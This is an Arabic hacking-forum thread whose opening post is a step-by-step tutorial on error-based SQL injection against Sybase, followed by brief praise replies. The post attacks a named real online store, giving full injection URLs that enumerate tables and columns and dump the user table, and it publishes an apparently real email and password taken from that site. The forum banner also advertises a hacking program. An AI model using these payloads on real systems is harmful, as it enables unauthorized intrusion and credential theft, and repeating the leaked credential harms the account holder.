1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. Hiker <span style="font-weight: bold; text-shadow: #BBBB
    rank
    V • I • P

    عضو منذ:
    ‏2 يوليو 2014
    عدد المشاركات:
    22
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    15
    اللغة البرمجية:
    Perl
    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاتة
    الجزء الثاني من حقن قاعدة السايبيز
    بعد ما تم بعون الله شرح الجزء الأول
    http://www.iq-team.org/vb/t27267.html
    ان شاء الله سوف نتطرق الى الجزء الثاني من

    حقن قواعد Sybase

    عن طريق Error Based


    نستخدم هذا النوع من الحقن اذا كانت معطلة بعض الاستعلامات
    مثل السيرفرات اللينكس هناك بعض الدوال تعطل
    عندنا بالحقن ايضاَ استعلامات تعطل ومن ضمنها
    order by
    و
    union

    ملاحظة في مواقع بتمشي عليها النوعين من الحقن
    نشوف هالموقع
    كود PHP:
      http://store.organicgrown.com/index.php?action=product&id=226
      

    نقوم بوضع علامة سينكل كيويت '
    كما نلاحظ الخطأ الي في الصوره
    [​IMG]
    طيب
    نجرب امر or 1=1
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=1--

    اختفى الخطأ
    [​IMG]
    طيب نجرب امر استخراج اصدار القاعدة بالاستعلام التالي
    كود PHP:
      or 1=CONVERT(integer,@@version
      
    convert = امر تحويل من قيمة الى قيمة معينة
    integer = قيمة رقمية
    يعني كإنما نقول حولي امر الاستعلام حق اصدار القاعدة الى قيمة رقمية
    نشوف كيف
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=CONVERT%28integer,@@version%29--

    كما نلاحظ في الصورة اصدار القاعدة
    [​IMG]
    ملاحظة هنا تظهر المعلومات المطلوبة من خلال الخطأ الموجود في الصفحه
    طيب نكمل
    نستخرج اسم القاعدة من خلال الاستعلام الآتي
    كود PHP:
    or 1=CONVERT(integer,db_name())--
    لتصبح الحقنه
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=CONVERT%28integer,db_name%28%29%29--
      

    كما نلاحظ اسم القاعدة ogcstore
    كما موضحة في الصوره التي بالاسفل
    [​IMG]

    الان نستعلم اسماء الجداول من خلال الاستعلام الآتي

    كود PHP:
    or 1=CONVERT(integer,(select max(name || 0x3a || convert(char,id)) from db-name..sysobjects where type=0x55) )--


    مع تغيير ما يلزم

    الآن نأتي الى تفسير ما يجري في هذا الاستعلام
    يعني هنا كأني خاطبت القاعدة وقلت
    اختارلي من اقصى او اعلى مكان حسب الترتيب في القاعدة اسم الجدول من نواة قاعدة السايبيز اينما وجدت جدول المستخدم اي جدول اليوزر يعني الملخص امر لاستعلام جدول اليوزر واستخراجه من بين جميع جداول القاعدة ...

    اما بالنسبه لهذه

    استخدمة لكي اقوم بتحويل اسماء الجداول الى عدد ترقيمي الذي يكون ترتيبه بداخل القاعدة

    لاحظ الحقنة كيف راح اصير
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=CONVERT%28integer,%28select%20max%28name%20||%200x3a%20||%20convert%28char,id%29%29%20from%20ogcstore..sysobjects%20where%20type=0x55%29%20%29--

    لاحظ استخرجنا جدول اليوزر بسرعة
    وبجانبه رقم هذا ترتيب جدول اليوزر في القاعدة وكما موضح في الصورة
    ec_users:864003078
    [​IMG]

    طيب الآن نتوجة لإستخراج اسماء الاعمدة الموجودة بداخل جدول اليوزر
    هنا نستخدم امر لاسختراج اسماء الاعمدة نفس امر استعلام استخراج اسماء الجداول مع مرآعاة التغير اللازم لاحظ معي الاستعلام الخاص بإستخراج اسماء الأعمدة
    كود PHP:
    or 1=CONVERT(integer,(select max(name || 0x3a || convert(char,colid)) from db-name..syscolumns where id=table id) )--

    هنا الاستعلام بنفس تفسير الاستعلام السابق ولكن الاختلاف البسيط
    هو colid = ترتيب الأعمدة داخل الجدول الموجودة في القاعدة
    مع تغيير
    sysobjects
    الى
    syscolumns

    ونضع مكان table id
    ترتيب الرقمي لجدول اليوزر الي ضهر لنا بجانب جدول اليوزر الي هو 864003078
    لتصبح الحقنة بهذا الشكل
    كود PHP:
    or 1=CONVERT(integer,(select max(name || 0x3a || convert(char,colid)) from ogcstore..syscolumns where id=864003078) )--

    كما نلاحظ استخرجنا اسم العمود (zip:12)
    وبجانبه رقم ترتيب العمود في الجدول الي بداخل قاعدة السايبيز
    كما موضح بالصورة
    [​IMG]

    طيب نستخرج اسماء الاعمدة البقية

    بإضافة استعلام بسيط آخر الحقنة لاحظ الاستعلام
    كود PHP:
      and colid not in(column id) =   اضهرلي اسم العمود مع ترتيبة بداخل الجدول اي استخرجلي اي عمود غير الي بين القوسين
      
    فيصبح الاستعلام بشكل الآتي
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=CONVERT%28integer,%28select%20max%28name%20||%200x3a%20||%20convert%28char,colid%29%29%20from%20ogcstore..syscolumns%20where%20id=864003078%20and%20colid%20not%20in%2812%29%29%20%29--

    لاحظ عمود usertype
    الي ترتيبة داخل الجدول هو 2
    اي ثاني عمود داخل الجدول
    [​IMG]
    الان نكمل عالسريع في استخراج بقية الاعمدة
    لتصبح الحقنه بهذا الشكل لاحظ
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=CONVERT%28integer,%28select%20max%28name%20||%200x3a%20||%20convert%28char,colid%29%29%20from%20ogcstore..syscolumns%20where%20id=864003078%20and%20colid%20not%20in%2812,2,11,1,6,14,18,4,19,15,20,3,7,17,16,8,21,13,5,10%29%29%20%29--

    الآن تعرفنا على جميع اسماء الجداول
    وتعرفنا ايظاَ على عدد الأعمدة التي بداخل جدول اليوزر وهي 21 عمود
    كل الي يهمنه منه
    عمود email:8 و password:14

    الي يقع ترتيبهم بداخل جدول اليوزر في 8 و14

    طيب نكمل الحقنة لنستخرج بيانات الاعمدة
    نستخدم الحقنة النهائيه هذه
    كود PHP:
    or 1=CONVERT(integer,(select max (column name1 || 0x3a || column name2from table users)

    مع مرآعاة التغير اللازم
    وتصبح الحقنة بالشكل النهائي
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=CONVERT%28integer,%28select%20max%20%28email%20||%200x3a%20||%20password%29%20from%20ec_users%29%29--

    [​IMG]
    كما نلاحظ استخرجنا بيانات الاعمدة للاميل والباسورد
    xcortal@organicgrown.com:Sal3y57

    الى هنا تم بعونه تعالى واسف اذا طولت
    واي استفسار انا حاضر او اي شئ غامض
    الى هنا نستودعكم الله

     
    جاري تحميل الصفحة...
  2. Resident Evil
    rank
    Developer

    عضو منذ:
    ‏27 ديسمبر 2011
    عدد المشاركات:
    44
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    20
    الإقامة:
    my home
    نظام التشغيل:
    Linux
    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    *

    الـسلام عليكم ,,

    جميل يعطيك العافيه

    رمـضان كـريم :{y.}
     
  3. zezo the king
    rank
    Developer

    عضو منذ:
    ‏23 يونيو 2012
    عدد المشاركات:
    7
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    امـــــ الدنيـــــــــــــــــــــا
    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    يعطيك العآفية , حبيبي مبدع
    بكل معنى الكلمة
     
  4. X - DeSiGN
    rank
    Developer

    عضو منذ:
    ‏30 مارس 2012
    عدد المشاركات:
    34
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    :: الجزائـر ::
    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    مشآء الله يسلمو يا مبدع ! !:"
     
  5. йỘ-įṖ
    Active DeveloPer

    عضو منذ:
    ‏24 يوليو 2012
    عدد المشاركات:
    93
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    تِسلَمْ آيدَكْ عَ هذآ آلطَرحْ آلمُمَيزْ ~ ،

    وآصِلْ يَ بَطلْ ~
    .
     
  6. М.ñàƒƒà3
    rankrank
    Active DeveloPer

    عضو منذ:
    ‏30 مارس 2012
    عدد المشاركات:
    66
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    الإقامة:
    فلسطين
    نظام التشغيل:
    Linux
    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    تسلم أيدك يابطل ً#ٌ5oًًًُ.
     
  7. sTRANGE WORLd
    Developer

    عضو منذ:
    ‏28 مارس 2012
    عدد المشاركات:
    103
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    50
    الوظيفة:
    قهر الحمايات
    الإقامة:
    مجهول
    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    بارك الله فيك
    مشكور على الطرح و المجهود
    تقبل تحياتي ً#ٌ5oًًًُ.​
     
  8. A.R.K.A.N
    DeveloPer Plus

    عضو منذ:
    ‏8 يناير 2013
    عدد المشاركات:
    144
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    50
    الإقامة:
    hacker
    نظام التشغيل:
    Linux
    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    احسنت على هذا الطرح اتمنى لك التوفيق
     
  9. Abo MalaK
    rank
    Developer

    عضو منذ:
    ‏15 يونيو 2012
    عدد المشاركات:
    43
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    يعطيك العافية يا مبدع
     
  10. Ahmed Egy
    rank
    Developer

    عضو منذ:
    ‏11 ديسمبر 2012
    عدد المشاركات:
    21
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    15
    الإقامة:
    Egypt
    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    تسلم اخى الكريم على الشرح ~
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...